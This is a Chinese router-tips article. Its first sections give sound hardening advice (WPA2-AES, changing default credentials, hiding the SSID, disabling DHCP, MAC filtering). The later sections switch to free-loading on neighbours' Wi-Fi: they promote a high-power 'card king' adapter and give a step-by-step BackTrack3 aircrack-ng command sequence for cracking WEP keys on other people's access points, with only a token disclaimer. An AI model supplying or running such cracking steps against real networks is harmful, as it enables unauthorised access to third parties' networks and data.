无线路由器密码破解:无线加密

拿到一款全新的无线路由器,首先要做的就是完成它的基本设置(推荐选择 设置向导 功能)。而在基本设置之中,必须要做的就是设置无线网络加密,这是保护无线网络最基本,也是最有效的方法。 除了可以在 设置

无线路由器密码破解:无线加密

拿到一款全新的无线路由器,首先要做的就是完成它的基本设置(推荐选择“设置向导”功能)。而在基本设置之中,必须要做的就是设置无线网络加密,这是保护无线网络最基本,也是最有效的方法。

除了可以在“设置向导”中完成无线网络的加密设置外,我们通常还可以在“无线网络设置”中找到更详细、更全面的加密设置。而且你知道吗?根据所选加密方式的不同,无线网络的性能也会受到不同程度的影响。

无线路由大讲堂:如何让无线网络更安全
无线网络加密

目前主流的无线网络加密方式有三种,即64/128位WEP加密、WPA加密和WPA2加密。这里特别需要说明的是,三种无线加密方式对无线网络传输速率的影响也不尽相同。由于IEEE 802.11n标准不支持以WEP加密(或TKIP加密算法)单播密码的高吞吐率,所以如果用户选择了WEP加密方式或WPA-PSK/WPA2-PSK加密方式的TKIP算法,无线传输速率将会自动限制在11g水平(理论值54Mbps,实际测试成绩在20Mbps左右)。

也就是说,如果用户使用的是符合IEEE 802.11n标准的无线产品(理论速率150M或300M),那么无线加密方式只能选择WPA-PSK/WPA2-PSK的AES算法加密,否则无线传输速率将会明显降低。而如果用户使用的是符合IEEE 802.11g标准的无线产品,那么三种加密方式都可以很好的兼容,不过仍然不建议大家选择WEP这种较老且已经被破解的加密方式,最好可以升级一下无线路由。

修改默认用户名和密码

设置好无线加密后,我们接下来要做的重要工作就是修改无线路由的默认登录用户名和密码。很多初级用户一定会问,为什么要这么做呢?原因很简单,因为同一型号、同一品牌甚至是不同品牌的无线路由器在出厂时所设置的默认用户名和密码几乎都是一样的。稍有经验的“非法用户”只需尝试几次就可以轻松进入无线路由的Web配置界面,从而全面控制你的无线网络。因此修改默认用户名和密码也是保护无线网络安全所必须的。

无线路由大讲堂:如何让无线网络更安全
修改默认用户名和密码

最后还要提醒一句,在修改完默认用户名和密码后,千万不要忘记“保存”哦,并重启无线路由器,重新用新的用户名和密码登录一下,以确定修改成功。

回到顶部阅读

无线路由器密码破解:关闭DHCP

修改SSID并关闭无线广播

在第一课中,我们曾建议初级用户修改SSID并开启无线广播,待熟悉了无线网络连接后,建议立即关闭无线广播。那么为什么无线广播要“先开后关”呢?我们还是先学习一下基础知识吧。

首先介绍一下什么是SSID?简单来说SSID就是在你搜索无线网络时,无线网络列表中所出现的一个个无线网络的名称。接下来再介绍一下无线广播的作用,打开无线广播就是把你的无线网络名称(SSID)公布出来,使其可以出现在你的无线网络列表之中;反之,关闭无线广播,你的无线网络名称就不会出现在无线网络列表之中了。


无线路由大讲堂:如何让无线网络更安全
修改SSID名称 关闭SSID广播

了解了这两个基础知识,相信你就能明白无线广播为什么要“先开后关”了。“先开”目的是为了让初级用户更容易找到并连接到自己无线网络;不过公开了SSID同样会引来非法入侵者,带来安全隐患,因此在初级用户熟悉了网络的连接方法后,我们需要“后关”,即关闭无线广播,让你的无线网络名称消失在无线网络列表中。

最后,我们还强烈建议大家修改SSID名称,为你的无线网络起一个个性的SSID。因为如果继续使用默认的“D-Link”、“TP-link”、“NETGEAR”等常见SSID名称会很容易就被别人猜到,那么关闭SSID广播也就失去了意义。

修改无线路由默认IP地址并关闭DHCP功能

关于无线路由的DHCP功能,我们在第一课中也已提到,简单来说它就是自动为连入无线网络的用户分配IP地址的一项功能,省去了用户手动设置IP地址的麻烦。因此对于初次接触无线路由的用户来说,我们建议大家打开此功能。

但如果想要进一步提升无线网络的安全,我们还是推荐用户关闭DHCP功能。因为一旦关闭了此功能,想要连接到你无线网络的非法用户就没法自动分配到IP地址了,那么他就得手工输入IP地址,而为了不让非法用户轻易猜到无线路由的IP地址段,我们还必须修改无线路由的默认IP地址。此时非法用户想要连接网络就必须挨个去尝试每个IP地址段,非常麻烦。所以建议大家关闭DHCP功能,修改默认IP地址,并手动设置笔记本/PC网卡的IP地址。

无线路由大讲堂:如何让无线网络更安全
修改默认IP地址 停用DHCP

下面讲一下手动设置网卡的IP地址需要注意的地方,手动输入的IP地址必须和无线路由器的IP地址(修改后的)保持在同一IP地址段,例如无线路由器修改后的IP地址为:192.168.123.1,那么网卡的IP地址即可设置为:192.168.123.X(X表示2-254任意数字);而默认网关与无线路由的IP地址相同即可。

回到顶部阅读

无线路由器密码破解:MAC地址过滤

强烈推荐:开启MAC地址过滤功能

完成了上述的基本安全设置,你的无线网络已经变得较为安全,但如果想让你的无线网络的安全防护能力有一个质的提升,我们强烈推荐你启用MAC地址过滤功能。

首先讲一下什么是MAC(它不是苹果的Mac)?MAC(Media Access Control),即介质访问控制地址的简称。MAC地址是厂商在生产网络设备时赋予每一台设备惟一的地址。其中,前24位标识网络设备的厂商,不同厂商生产的标识不同,后24位是由厂商指定的网络设备的序列号。

“MAC地址过滤”功能正是利用了MAC地址的唯一性,即一台网络设备对应一个MAC地址,只有在无线路由器的MAC地址“允许”列表中的网络设备(需提前输入MAC地址)才能接入网络,这种方法可以非常有效的阻止非法用户的入侵,即使面对现在非常猖獗的“蹭网卡”,也能起到很好的防护作用。


无线路由大讲堂:如何让无线网络更安全
开启MAC地址过滤功能

无线路由大讲堂:如何让无线网络更安全
输入允许接入设备的MAC地址

想要使用MAC地址过滤功能,就必须要知道自己无线网卡的MAC地址,那么你知道自己无线网卡的MAC地址是什么吗?不知道也没关系,因为查看方法很简单:在“网络连接”中找到“网络连接”图标,右键->“状态”,选择“支持”->“详细信息”,其中的“实际地址”就是你无线网卡的MAC地址。

无线路由大讲堂:如何让无线网络更安全
查看MAC地址

此外,用户还可以点击任务栏的“开始”->运行->在弹出的“运行”窗口文本框内输入“cmd”,然后单击“确定”按钮;然后在命令窗口中输入“ipconfig /all”后回车,此时在显示的结果中同样可以找到网卡的MAC地址。

无线路由大讲堂:如何让无线网络更安全
查看MAC地址

最后还有一点需要特别提醒,当你在使用MAC地址过滤功能时,一定要勾选“启用/打开”选项,否则完全没有效果(⊙﹏⊙b汗)。

回到顶部阅读

无线路由器密码破解:不公开无线密钥

不公开无线密钥 选择“WPS”一键加密

无线网络加密密钥的泄露是造成非法用户入侵的主要原因之一,因此我们推荐大家选择WPS“一键加密”功能。通过此功能,你只需轻轻一按即可获得WPA2级的安全连接,既省去了记忆冗长加密密钥的麻烦;还可以防止公共加密密钥的泄露,进一步提升无线网络的安全。怎么样,是不是非常棒呢?


无线路由大讲堂:如何让无线网络更安全
WPS功能

目前市场中主流的无线路由器均已加入了“WPS”功能,相信的你的无线路由器上也已经设计了“WPS”按键,赶快去找找看吧。而目前实现WPS连接则主要有两种方法,即输入PIN码法(Pin Input Configuration,PIN)和按钮配置法(Push Button Configuration,PBC),其中以PBC按钮法最为简单方便,推荐大家选择此方法。

当然,想要实现“WPS”一键加密,同样需要无线客户端的支持。有关WPS的更多知识,我们将在下一期无线路由大讲堂中做详细介绍,敬请期待!

关闭无线网络

其实要说保护无线网络最安全有效的方法,那绝对是关闭无线网络,这样非法入侵者即使再有能力也无法进入你的网络。当然,这里的“关闭”并不是说让大家不使用无线网络,而是希望大家养成良好的无线网络使用习惯,在不需要无线连接时候,关闭无线网络功能,进一步降低非法用户入侵的可能性。

无线路由大讲堂:如何让无线网络更安全
关闭无线网络

最后,还有个建议必须向广大网络设备厂商提一下,目前市面上仅有少数的无线路由器设计了外置无线网络开关,绝大多数无线路由仍需要进入Web配置界面进行手动开关无线网络,并等待无线路由器重启,这一操作过程确实比较麻烦,希望未来推出的无线路由器都能加入外置无线网络开关这一功能,让用户可以更好的掌控自己的无线网络。

总结:体验精彩无线 安全不能忽视

怎么样,今天《无线路由大讲堂》第二课的内容你学会了吗?现在我们再来做个总结:首先是最简单也是最基础的设置——无线加密,我们推荐大家选择WPA-PSK/WPA2-PSK的AES算法加密;另外,千万不要忘记修改默认登录密码哦。接下来,建议大家关闭SSID广播,并停用DHCP功能,这样可以进一步提升无线网络的安全性;当然,保护无线网络安全最有效也是我们强烈推荐的方法仍是MAC地址过滤,效果谁用谁知道。最后,推荐大家尝试“WPS”一键加密功能,效果同样出色。

通过今天的课程,相信你已经学会了如何通过简单的设置提升无线网络的性能了,那就赶快去动手实践一下吧,无线安全防护刻不容缓哦。最后再做个预告,别忘了继续关注下一期《无线路由大讲堂》哦,我们将为你讲述神奇的“WPS一键加密”。

回到顶部阅读

无线路由器密码破解:蹭网卡

对于个人用户来说,接触无线最多的方式可能就是ADSL+无线路由器了,想必你的电脑也会搜索到很多其它接入点,这些接入点或者信号很低,或者已经加密,其实这些无线信号也能被第三方利用。本着讨论技术的目的,本文将介绍无线网络破解的一些思路,但希望广大网友不要滥用,要以此为戒来保护自己的无线安全。

信号增强问题

提高接入点数量是首要问题。一般情况下,笔记本内置的无线网卡在搜寻接入点时会偏弱于外部无线网卡,另外天线问题也是一个很关键的因素,网络上有一种特殊的无线网卡,其搜索能力很强。


上网不花钱?无线网络蹭网技术揭秘
卡皇实物

在国内某家网站宣传的其“卡皇”产品,声称发射功率达500mw,是普通网卡的10倍,其可视传输距离为3600米,也就是半径3600米内的接入点都会被搜索到,不管该接入点是否加密。如果你住在居民区,那周围的写字楼,商场,批发市场,住宅小区,咖啡厅包含的接入点将和你家中无线路由器发出的无线信号一样,都被这款卡皇嗅探到。

上网不花钱?无线网络蹭网技术揭秘
外置天线

我们来看看这款设备有何特殊之处:采用RTL8187L芯片,功率更强,信号接收多。完美支持BT3(这个后面会讲到),可外接天线。

搜索到无线信号以后,我们会发现大部分接入点都是加密的,接下来就需要配合软件方式破解密码。

回到顶部阅读

无线路由器密码破解:破解密码

BackTrack3(BT3)破解密码

  BackTrack是基于SLAX的自启动运行光盘,是基于linux发行版的系统。目前使用最多的是V3 Final版本,但这个版本对少数网卡支持存在一些问题,所以V3 Beta版本仍有部分人在使用。BackTrack集中了无线网络几乎能见到的安全和破解工具,可谓无线网络破解的百宝箱,全球各地的人使用它破解了无数的无线网络,从侧面促进了大众无线网络安全意识的迅速提高。


上网不花钱?无线网络蹭网技术揭秘
BackTrack3

由于我们需要在BT3下破解,而使用的是Windows系统,所以需要在虚拟机下安装BT3CD版。安装系统类型选择Linux,空间需要大于4GB,具体安装过程与其他系统并无两样,下面主要讲解一下进入系统后的破解工作。

打开终端窗口,输入以下命令(括号内为解释内容):

ifconfig -a (查看无线网卡Mac地址)

airmon-ng start wifi0 5

(其中wifi0是电脑里面给无线网卡的,一般都是这个,用ifconfig -a命令可以看得到。wifi0 后面的5是需要破解AP频道,可以在左下角开始菜单里面,找到第二项Internet中的无线网工具,查看AP的频道Channel。然后会看到出现一个 Ath2,格式为XXX1样式)

airodump-ng --ivs -w name -c5 ath2 (5和ath2根据自己的结果修改)

aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath2 (XX内容为MAC地址)

aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath2

packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp (XX是网卡MAC地址,XXXXX-XXXXXX就是上次命令返回的文件名)

aireplay-ng -2 -r mrarp -x 1024 ath2

打开一个新的窗口,运行

aircrack-ng -n 64 -b ap_mac name-XX.ivs(name-XX.ivs需要到桌面生成文件夹里查看,找到序号最大的那个)

一般情况下,用不了太久,密码就会显示出来,当然只局限于破解WEP加密方式。

防范与总结

要杜绝WEP加密方式,另外最好的办法就是在无线路由器上采取MAC绑定,对准入MAC进行白名单处理,不过这种方法不太适合公用场合的AP,但换一种加密方法还是比较容易的。

上网不花钱?无线网络蹭网技术揭秘
设置准入设备防止蹭网者连接无线网络

对于无线破解来说并不复杂,掌握了基本的方法后破解效率觉得称得上高效,不过随着上网资费的下调,蹭网情况会越来越少,加之卡皇设备功率大,辐射也不容小视,并且从法律的角度也是不允许这种行为的。希望广大网友提高警惕,保护好自己的无线网络。

原创文章,作者:192.168.1.1,如若转载,请注明出处:https://www.224m.com/7000.html

(0)
192.168.1.1192.168.1.1
上一篇 2020年5月30日 01:19
下一篇 2020年5月30日 01:40

相关推荐

  • 360路由器管理密码忘记了怎么办

    问:360路由器管理密码是什么?360路由器管理密码忘记了怎么办?家里的360路由器用了很长一段时间了,今天想登录到设置界面,重新设置路由器。打开luyou.360.cn登录页面时,提示需要输入管理密码;但是我根本就不知道管理密码是什么,应该怎么办?答:360路由器管理密码,其实就是360路由器的登

    2021年6月9日
  • 迅捷(fast)fw315r登录密码忘记了怎么办?

    问:迅捷(fast)fw315r登录密码忘记了怎么办?设置迅捷FW315R路由器,打开falogin.cn管理页面的时候,提示需要输入“登录密码”。但是我不知道FW315R的登录密码是多少,无法登录到设置页面,现在应该怎么办?答:如果不知道/忘记了迅捷FW315R登录密码,解决办法是:先把你的这台迅

    2021年6月4日
  • 无线路由器怎么修改默认登陆密码

    说到路由器的密码,我们可以分为三个:无线密码,管理密码,宽带密码;今天我们说的就是如何修改无线路由器的管理密码,如果需要查看修改路由器的无线密码请移至另一篇文章查看。 路由器登陆密码 路由器管理密码是登陆到路由器的时候需要用到的密码,新拿到的路由器通常默认用户名和密码都是admin,当然你还可以通过查看路由器的背面"

    路由器密码 2021年1月24日
  • 荣耀路由X3登录密码忘了怎么办?

    如果你将荣耀路由X3的登录密码忘了,无法登录到它的设置页面。在这种情况下,请仔细阅读下面的内容,以解决你的这个问题。1. 首次设置荣耀路由X3上网时,系统默认会将你设置的Wi-Fi密码作为登录密码。所以,让你忘记登录密码的时候,可以尝试用Wi-Fi密码来进行登录。2. 如果你使用Wi-Fi密码登录失

    2021年6月3日
  • 联想(Lenovo)无线路由器密码忘了怎么办

    联想(Lenovo)无线路由器密码忘了怎么办?经常有有用户咨询这个问题,有的用户是忘记登录密码,有些用户经常会忘记路由器中无线我ifii密码。那么在忘记密码后,应该如何解决这个问题呢?一、无线WiFi密码忘记了如果你忘记了联想路由器中设置的无线WiFi密码,解决办法有好几个。可以登录到路由器设置界面

    2021年6月13日
  • 如何看wifi密码是多少

    在当今的数字化社会,Wi-Fi已经成为人们日常生活和工作中不可或缺的一部分。如果你忘记了你的Wi-Fi密码,或者想要更改它,那么你需要知道如何找到并访问Wi-Fi路由器管理页面。以…

    2023年5月28日
  • 忘记电脑无线密码怎么办?教你查看路由器WiFi密码

    时间久了就会忘记密码,是大部分人都有过的经历,想必各位家里宽带账号忘记过,无线密码也忘记过吧。那么忘记电脑无线密码怎么办呢?一般无线密码忘记了,需要输入路由器IP地址,然后输入用户名账号,进入路由器

    2020年6月5日
  • 无线路由器登陆密码忘了怎么办?如何找回?

    无线路由器的登陆密码就是管理路由器的钥匙,没有这把钥匙就打不开路由器网址这把锁,也就不能进入路由器管理界面对路由器进行各种操作了,如果你真的忘记了路由器的登陆密码,首先建议你尝试一下路由器初始的默认密

    2020年6月28日
  • 睿因路由器默认无线密码是多少?

    请问大家:睿因路由器的默认无线网密码是多少?答:睿因路由器的无线网络,没有默认的密码;睿因路由器的无线网密码,是第一次设置或者恢复出厂设置后重新设置的时候,打开设置向导页面后,系统要求用户自己设置的,如下图所示:如果忘记了睿因路由器的无线网密码,导致其它的无线设备无法进行连接,这种情况下,可以尝试用

    2021年5月28日
  • 360家庭防火墙路由器登录密码错误怎么办?

    问:360家庭防火墙路由器登录密码错误怎么办?答:设置360家庭防火墙路由器的时候,如果登录密码错误,不能登录到它的设置界面。这种情况下,可以尝试用下面的方法来解决。1.在你的360家庭防火墙路由器的背面铭牌上,看一下是否有初始登录密码? 如果铭牌上有显示登录密码,输入这个密码试一下能否登录?注意:

    2021年6月11日